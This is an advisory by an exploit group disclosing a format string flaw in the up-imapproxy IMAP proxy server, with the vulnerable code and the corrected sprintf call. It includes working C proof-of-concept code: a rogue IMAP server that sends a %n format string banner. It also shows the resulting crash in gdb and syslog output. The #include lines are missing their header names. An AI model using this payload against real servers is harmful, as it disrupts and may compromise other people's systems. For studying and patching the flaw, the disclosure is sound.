[.:: ExploiterZ Labs aka Unl0ck Research Team ::.] Advisory target: Imapproxy version: 1.2.4 and earlier type: format string remote: yes vendor: http://imapproxy.org patch: doesn't exists [.: Details :.] Fromat string vulnerability was found in latest version of IMAP proxy server (up-imapproxy). Vulnerability exists in: /up-imapproxy-1.2.4/src/main.c function: ParseBannerAndCapability(); static int ParseBannerAndCapability( char *DestBuf, unsigned int DestBufSize, char *SourceBuf, unsigned int SourceBufSize ) { ... SourceBuf[SourceBufSize - 2] = '\0'; CP = strtok( SourceBuf, " " ); ... sprintf( DestBuf, CP ); ... } This function uses in another function from main.c. function: SetBannerAndCapability() static void SetBannerAndCapability( void ) { ... BannerLen = ParseBannerAndCapability( Banner, sizeof Banner - 1, itd.ReadBuf, BytesRead ); ... if ( strncasecmp( Banner, IMAP_UNTAGGED_OK, strlen(IMAP_UNTAGGED_OK)) ) { syslog(LOG_ERR, "%s: Unexpected response from imap server on initial connection: %s -- Exiting.", fn, Banner); close( itd.conn->sd ); exit( 1 ); } ... } As you can see ParseBannerAndCapability() function calls vulnerable sprintf() without format string. Correct call must be: sprintf( DestBuf, "%s", CP ); instead sprintf( DestBuf, CP ); Vulnerability can be used to execute arbitary code on target's machine. Imapproxy incorrectly parse banner from IMAP daemon. Look at below PoC code. [.: PoC :.] /* PoC exploit code for up-imapproxy <= 1.2.4 by Darkeagle from ExploiterZ Labs eagle [ at ] exploiterz [ dot ] org an exploit binds port (143) and when imapproxy connects to this exploit-server and gets banner, it's child process crashes.. */ #include #include #include #include #include #include #include #define BANNER "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n" int main ( int argc, char *argv[] ) { struct sockaddr_in addr, cl_addr; int sock, cl_sock, addr_size; char *Iaddr; socklen_t l; printf("Imapproxy <= 1.2.4 PoC Exploit\n"); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); addr.sin_family = AF_INET; addr.sin_port = htons(143); addr.sin_addr.s_addr = inet_addr("127.0.0.1"); bind(sock, (struct sockaddr*)&addr, sizeof(addr)); listen(sock, 5); addr_size = sizeof(addr); while (1) { cl_sock = accept(sock, (struct sockaddr*)&cl_addr, &l); Iaddr = inet_ntoa(cl_addr.sin_addr); send(cl_sock, BANNER, strlen(BANNER), 0); printf("IP: %s\n", Iaddr); } return 0; } [.: Screenshot :.] .. Child Process crashed .. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1076593408 (LWP 8279)] 0x401b5904 in vfprintf () from /lib/tls/libc.so.6 (gdb) ... .. Syslog details .. [root@localhost bin]# tail -10 /var/log/syslog .... Oct 28 14:12:55 localhost in.imapproxyd[9201]: SetBannerAndCapability(): Unexpected response from imap server on initial connection: AAAAAAAAAbfffc4ccbfffc4ccbfffc4b45bfffd4e8804afb98056E60^M -- Exiting. [root@localhost bin]# [.: Credits :.] Goes to Darkeagle [ eagle { at } exploiterz { dot } org ] http://exploiterz.org || http://55k7.org (c) 2004-2005 Unl0ck Research Team